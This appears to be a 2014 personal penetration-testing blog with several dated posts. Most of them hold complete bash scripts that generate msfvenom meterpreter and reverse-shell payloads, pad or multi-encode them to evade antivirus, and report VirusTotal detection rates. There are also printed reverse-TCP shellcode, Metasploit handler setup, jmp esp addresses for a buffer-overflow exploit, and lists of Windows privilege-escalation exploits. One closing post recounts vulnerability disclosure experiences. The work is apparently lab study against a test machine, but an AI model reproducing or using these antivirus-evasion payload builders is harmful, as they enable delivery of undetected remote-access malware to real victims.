Monday, November 24, 2014

bash script built on technique to bypass AV v2

This script has been improved and is located at this blog post.

I took the previous script that I created and spent some time adding additional padding and moving the meterpreter portion of the c code to a variable inside of the main function.

With these few modifications I was able to achieve the following results as I uploaded them to virustotal.com.

The sample at the top of the screen is using version 1 of the below script.  With the below script the detection rate decreases to 2-4 anti-viruses detecting them out of an average of 55.

The below script is what I used to generate the exe files...

#!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.27.66.1
# LPORT: 8080
# Bad Characters: \x00 \xff
# Encoder: x86/shikata_ga_nai
# Iterations: 3
# Output format: C

# Create some padding to be compiled in the C program
function generatePadding {

    counter=0
    randomNumber=$((RANDOM%200+5))
    #echo $randomNumber
    while [  $counter -lt $randomNumber ]; do
        echo "" >> /root/bypassAV/prog.c
        randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c 12`
        randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c 2048`
        echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> /root/bypassAV/prog.c
        let counter=counter+1
    done
}

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.27.66.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Until the prog.exe is compiled successfully loop until it is
while [ ! -f /root/bypassAV/outputFiles/prog.exe ]; do

    # Generate 2048 characters of random awesomeness for padding
    randomFilename=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c 12`
    randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c 2048`
    echo "unsigned char ${randomFilename}[]=\"$randomPadding\";" > /root/bypassAV/prog.c
   
    generatePadding

    echo "" >> /root/bypassAV/prog.c
    echo "int main(void)" >> /root/bypassAV/prog.c
    echo "{" >> /root/bypassAV/prog.c
   
    generatePadding
   
    echo "" >> /root/bypassAV/prog.c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.27.66.1 LPORT=8085 -b "\x00\xff" -e x86/shikata_ga_nai -i 3 -f c >> /root/bypassAV/prog.c

    generatePadding

    echo "" >> /root/bypassAV/prog.c
    echo "((void (*)())buf)();" >> /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    echo "}" >> /root/bypassAV/prog.c

    cat /root/bypassAV/prog.c | sed 's/buf/yiopl/g' > /root/bypassAV/prog.c.temp
    mv -f /root/bypassAV/prog.c.temp /root/bypassAV/prog.c
    i586-mingw32msvc-gcc -o /root/bypassAV/outputFiles/prog.exe /root/bypassAV/prog.c
done

# If the prog.exe fails to be created then skip over the remaining commands
if [[ -f "/root/bypassAV/outputFiles/prog.exe" ]]; then

    # Create a random 64 character filename to use as the destination file
    randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`

    # Save the information to a log file in the event the file bypasses the AV
    echo "${randomFileName}.exe - msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.27.66.1 LPORT=8085 -b \"\x00\xff\" -e x86/shikata_ga_nai -i 3 -f c" >> $logFile

    cp -f /root/bypassAV/outputFiles/prog.exe /mnt/payloadTest/${randomFileName}.exe
    cp -f /root/bypassAV/outputFiles/prog.exe /root/bypassAV/archiveFiles/${randomFileName}.exe
    rm -f /root/bypassAV/outputFiles/prog.exe

fi
# End If for the prog.exe file not being created


Also in researching other techniques I found the below web page:
https://www.pentestgeek.com/2014/07/15/bypassing-antivirus-crypter-cff-explorer/


Sunday, November 23, 2014

bash script built on technique to bypass AV

I found the following web page in my research about metasploit encoding and bypassing the AV.

https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

From the article I created the following bash script to automate the creation of the .exe file that can be copied to the Windows XP SP3 through a file share to test AVG 2015.  Fortunately or unfortunately this technique does bypass the AVG 2015 Free, so far 3/3 100% success rate.  Virustotal came back with 15 AVs detecting the files as malware.

This script has been improved and is located at this blog post.

 #!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.24.118.1
# LPORT: 8080
# Bad Characters: \x00 \xff
# Encoder: x86/shikata_ga_nai
# Iterations: 3
# Output format: C

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.24.118.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Until the prog.exe is compiled successfully loop until it is
while [ ! -f /root/bypassAV/outputFiles/prog.exe ]; do

    # Generate 2048 characters of random awesomeness for padding
    randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c 2048`
    echo "unsigned char padding[]=\"$randomPadding\";" > /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.24.118.1 LPORT=8085 -b "\x00\xff" -e x86/shikata_ga_nai -i 3 -f c >> /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    echo "int main(void) { ((void (*)())buf)();}" >> /root/bypassAV/prog.c

    # Using mingw on Kali Linux to compile the executable
    i586-mingw32msvc-gcc -o /root/bypassAV/outputFiles/prog.exe /root/bypassAV/prog.c
done
  
# If the prog.exe fails to be created then skip over the remaining commands
if [[ -f "/root/bypassAV/outputFiles/prog.exe" ]]; then

    # Create a random 64 character filename to use as the destination file
    randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`

    # Save the information to a log file in the event the file bypasses the AV
    echo "${randomFileName}.exe - msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.24.118.1 LPORT=8085 -b \"\x00\xff\" -e x86/shikata_ga_nai -i 3 -f c" >> $logFile

    cp -f /root/bypassAV/outputFiles/prog.exe /mnt/payloadTest/${randomFileName}.exe
    cp -f /root/bypassAV/outputFiles/prog.exe /root/bypassAV/archiveFiles/${randomFileName}.exe
    rm -f /root/bypassAV/outputFiles/prog.exe

fi
# End If for the prog.exe file not being created





msfencode bash script - Test encoding with up to 5 iterations

I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations.  Then in the script copy it over to a file share on a Windows XP SP3 computer with AVG installed.  The AVG would then detect if it was a virus.

Curious how this would work and kicked out the following script. 

#!/bin/bash
#
# File that contains the encoders that are available to msfencode
listEncoders='/root/multiEncoder/msfencode.listEncoders'

# Folder where the SYS Internals Suite EXE files are located
exeFiles='/root/multiEncoder/sysInternals/exe/'

# Log file where how the payload was created and the filename of the payload
logFile='/root/multiEncoder/logFile.txt'

# Number of iterations to run the encoding through
iterationCount=5

# Bash script to create various payloads that are multi-encoded and test them against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfpayload options
# Payload: windows/shell_reverse_tcp
# LHOST: 172.29.231.1
# LPORT: 8080

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.29.231.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Loop through the available encoders in msfencode.listEncoders
while read listEncoders
do
    # Work through various iteractions allowed for the encoding
    for (( i=2; i<=$iterationCount; i++ ))
    do
        msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k
   
        # If the test.exe fails to be created then skip over the remaining commands
        if [[ -f "/root/multiEncoder/outputFiles/test.exe" ]]; then

            # Create a random 64 character filename to use as the destination file
            randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`

            # Save the information to a log file in the event the encoding bypasses the AV
            echo "${randomFileName}.exe - msfpayload windows/shell_reverse_tcp LHOST=172.29.231.1 LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k" >> $logFile

            cp -f /root/multiEncoder/outputFiles/test.exe /mnt/payloadTest/${randomFileName}.exe
            cp -f /root/multiEncoder/outputFiles/test.exe /root/multiEncoder/archiveFiles/${randomFileName}.exe
            rm -f /root/multiEncoder/outputFiles/test.exe

        fi
        # End If for the text.exe file not being created
    done
    # Done for the loop on the iteractionCount

done < /root/multiEncoder/msfencode.listEncoders

Saturday, November 22, 2014

Notes about Windows Privilege Escalation

I need to research and understand windows privilege escalation better so this is the beginning of the journey.

Links to a couple of web pages that I have found to be great:
http://pentestmonkey.net/tools/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
http://www.fuzzysecurity.com/tutorials/18.html
http://www.slideshare.net/harmj0y/power-up-34515686

accesschk.exe from the SYS Internals Suite

Evaluating closer the Windows Privilege Escalation python script I was curious how the latest windows patches were discovered and scrubbed against metasploit.  Found that the following link takes you to an Excel spreadsheet containing all of the windows security bulletins:

http://www.microsoft.com/en-us/download/details.aspx?id=36982

From fuzzysecurity.com I extracted some of the privilege escalation KB numbers...
KiTrap0D - KB979682
MS10-021 - KB979683
MS10-059 - KB982799
MS11-011 - KB2393802
MS11-080 - KB2592799

Pulled from metasploit the local exploits that can be run:
--------------------------------------------------------

exploit/windows/local/always_install_elevated - excellent  Windows AlwaysInstallElevated MSI

exploit/windows/local/bypassuac_injection - excellent  Windows Escalate UAC Protection Bypass (In Memory Injection)

exploit/windows/local/ms10_015_kitrap0d - great Windows SYSTEM Escalation via KiTrap0D

exploit/windows/local/ms10_092_schelevator - excellent  Windows Escalate Task Scheduler XML Privilege Escalation

exploit/windows/local/ms11_080_afdjoinleaf - average    MS11-080 AfdJoinLeaf Privilege Escalation

exploit/windows/local/ms13_005_hwnd_broadcast - excellent  MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation

exploit/windows/local/ms13_053_schlamperei - average Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

exploit/windows/local/ms13_081_track_popup_menu - average    Windows TrackPopupMenuEx Win32k NULL Page

exploit/windows/local/ms13_097_ie_registry_symlink - great MS13-097 Registry Symlink IE Sandbox Escape

exploit/windows/local/ms14_009_ie_dfsvc - great MS14-009 .NET Deployment Service IE Sandbox Escape

exploit/windows/local/ms_ndproxy - average    MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation

exploit/windows/local/ppr_flatten_rec - average    Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

exploit/windows/local/trusted_service_path - excellent  Windows Service Trusted Path Privilege Escalation

exploit/windows/local/virtual_box_guest_additions - average    VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation

post/windows/escalate - Also look at these post exploitation modules...


Pulled from the exploitdb files.csv list on Kali Linux the following:
-----------------------------------------------------------------
root@p9jer5:/usr/share/exploitdb# cat files.csv | grep -e "MS0" -e "MS1" | grep -i -e "escala" -e "elevation"

350,platforms/windows/local/350.c,"MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
351,platforms/windows/local/351.c,"MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0
1198,platforms/windows/local/1198.c,"MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0
1407,platforms/windows/local/1407.c,"MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
1911,platforms/windows/local/1911.c,"MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0
2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
3688,platforms/windows/local/3688.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
3755,platforms/windows/local/3755.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2",2007-04-17,"Lionel d'Hauenens",windows,local,0
3804,platforms/windows/remote/3804.txt,"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
14611,platforms/windows/dos/14611.c,"Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0
18176,platforms/windows/local/18176.py,"Windows Afd.sys - Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
21844,platforms/windows/local/21844.rb,"MS11-080 AfdJoinLeaf Privilege Escalation",2012-10-10,metasploit,windows,local,0
27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0

Notes created for Immunity Debugger

Notes about generating a payload for a python script, setting up a multi-handler, and using a multi-handler to then exploit and gain a meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
-----------------------------------------------------------------
use payload/windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates a payload without the hex characters following the b in the language of python.

buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4\xb8\xec\x27\x13\x24\x5b\x33"
buf += "\xc9\xb1\x18\x31\x43\x18\x83\xeb\xfc\x03\x43\xf8\xc5"
buf += "\xe6\xd8\x31\xd1\x6d\xaa\x72\xd5\xe6\xec\x78\x9e\xa9"
buf += "\xf0\x0b\xb2\xc2\x7b\x2b\x1e\x79\x35\x28\x66\xbf\xf8"
buf += "\x1d\x39\x8d\x89\x8e\x4e\x9b\x79\xdb\x14\x60\xf1\x97"
buf += "\x93\xe0\x8e\x6b\x91\x0c\x90\x9a\x22\x6d\xca\x5d\xdd"
buf += "\xe5\x9b\x61\x1c\x14\x58\xf0\x12\xbb\x35\x03\x41\x39"
buf += "\x35\xd3\x02\x55\x65\xc3\x4a\xa7\x1d\xe1\x92\xb6\x81"
buf += "\x6c\x73\xeb\x8e\x62\x27\x5d\xa6\x2b\xad\x4d\x19\x9c"
buf += "\x67\x91\x7c"

use exploit/multi/handler
set payload windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1

*** With the Immunity Debugger we need to find memory addresses that have "jmp esp" instructions.

1. Load or attach the FTP server with Immunity Debugger
2. Click the shortcut of "e" to load the Modules menu of all of the .dll's that are running
3. Double click on one of them not related to the FTP server
4. Right-click go to Search for ... "All commands in all modules"
5. Key in the instruction that you are searching for "jmp esp"
6. It then returns a list of "jmp esp" instructions and associated memory addresses...
Windows XP w/ SP3 - MFC42.dll 0x73E32ECF
Windows XP w/ SP3 - WINMM.dll 0x76B43ADC
Windows XP w/ SP3 - ADVAPI32.dll 0x77DEF049

Wednesday, November 5, 2014

Experiences of Reporting Vulnerabilities

I thought I would take a moment and memorialize a few experiences with reporting vulnerabilities to companies.  With the below information I am going to keep the companies anonymous.  The below vulnerabilities discussed have been mitigated by the companies in which they were reported too.  I am going too share the good, bad, and ugly ways in which companies handled these reports.

The first experience was contacting a company that publishes content and allows this content to be accessed by their respective customers.  The vulnerability existed in the security between their customers and the content that could be accessed.  With manipulating the URL with an authenticated user you could view other customers content and then it was discovered that without being authenticated you could view this information.  Upon contacting the company directly and working with them, they were appreciative that I reached out to them and I even received a courtesy call from the president of the company expressing his appreciation.

The second experience was working with a company that uses a content delivery network (CDN) to deliver the content, however as they transferred from the authenticated initial page to the material in the CDN the session was not maintained and allowed anyone to access the content without being authenticated.  The company came back again with appreciation for identifying this flaw in their platform.

Now to share a couple of experiences that did not turn out to be as positive during the experience of reporting the vulnerabilities.

The third experience was working with a company that had multiple vulnerabilities including a Cross-Site Request Forgery (CSRF) vulnerability which allows an administrator account to be created while another administrator is authenticated.  Upon reporting this to the company they setup a conference call to discuss it.  When the conference call occurred the company was unprepared with the information that I had provided.  They did not openly acknowledge they had an issue.  Then I sent them the proof-of-concept and notes that I had kept.  Then the conversation started over on the conference call.  I could not believe how ignorant they were in preparing for the conference call and how cocky they were until a real vulnerability was identified in their eyes.

The forth experience was after a user authenticated to a platform to view billing information.  Upon manipulating the URL you could easily view other customers billing information.  The first hurdle we ran into was how and where to report this vulnerability.  The only method of contact was through a customer service phone call.  After calling them they were unsure where to direct the call.  They eventually documented the ticket and escalated it.  About a month later I received a phone call from their attorney to clarify the information that was provided and determine the impact on the customers whose billing information was accessed.  He then went on a rant about not doing this and it was illegal what we did.  Being that I was the one whom the vulnerability was reported too and I had not exploited the vulnerability I just listened.  With that stated I could not believe they had no appreciation for finding and reporting this vulnerability, had it gone unreported it could have turned into a larger issue for the company (if it had not already turned into a larger issue).  Then in conversing a little more with their attorney to identify that their website was controlled by a vendor and the vendor did not have the logs that would demonstrate which records were accessed through this vulnerability and were trying to depend on my records of which customers were impacted (which I did not have).  The company did let me know that the vulnerability was mitigated. In my opinion, they have a lot of other issues to work through than the specific vulnerability that was identified.



Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...